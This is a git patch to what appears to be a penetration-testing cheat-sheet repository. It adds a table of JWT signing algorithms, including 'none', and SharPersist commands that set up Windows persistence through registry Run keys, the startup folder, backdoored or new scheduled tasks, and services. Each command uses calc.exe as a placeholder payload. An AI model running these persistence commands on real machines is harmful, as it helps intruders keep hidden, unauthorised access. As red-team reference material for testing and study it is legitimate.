From 742e3204d3ddc2a521555acff02d8b6f3d9aeb52 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 13 Sep 2019 17:38:23 +0200 Subject: [PATCH] SharpPersist - Windows Persistence --- JSON Web Token/README.md | 21 +++++++++- .../Windows - Persistence.md | 41 ++++++++++++++++++- 2 files changed, 60 insertions(+), 2 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index ccdb745b..a6fb0808 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). } ``` +| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements | +|---|---|---| +| HS256 | HMAC using SHA-256 | Required | +| HS384 | HMAC using SHA-384 | Optional | +| HS512 | HMAC using SHA-512 | Optional | +| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended | +| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional | +| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional | +| ES256 | ECDSA using P-256 and SHA-256 | Recommended | +| ES384 | ECDSA using P-384 and SHA-384 | Optional | +| ES512 | ECDSA using P-521 and SHA-512 | Optional | +| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional | +| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional | +| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional | +| none | No digital signature or MAC performed | Required | + + + ### Payload ```json @@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) -- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) \ No newline at end of file +- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d8fa2cd3..d005bd8a 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -2,6 +2,7 @@ ## Summary +* [Tools](#tools) * [Userland](#userland) * [Registry](#registry) * [Startup](#startup) @@ -13,6 +14,10 @@ * [References](#references) +## Tools + +- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist) + ## Userland ### Registry @@ -24,6 +29,14 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add +``` + ### Startup Create a batch script in the user startup folder. @@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add +``` + ### Scheduled Task ```powershell @@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +Using SharPersist + +```powershell +# Add to a current scheduled task +SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add + +# Add new task +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly +``` + +## Windows Service + +Using SharPersist + +```powershell +SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add +``` + ## Elevated ### HKLM @@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) -* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file +* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) +* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) \ No newline at end of file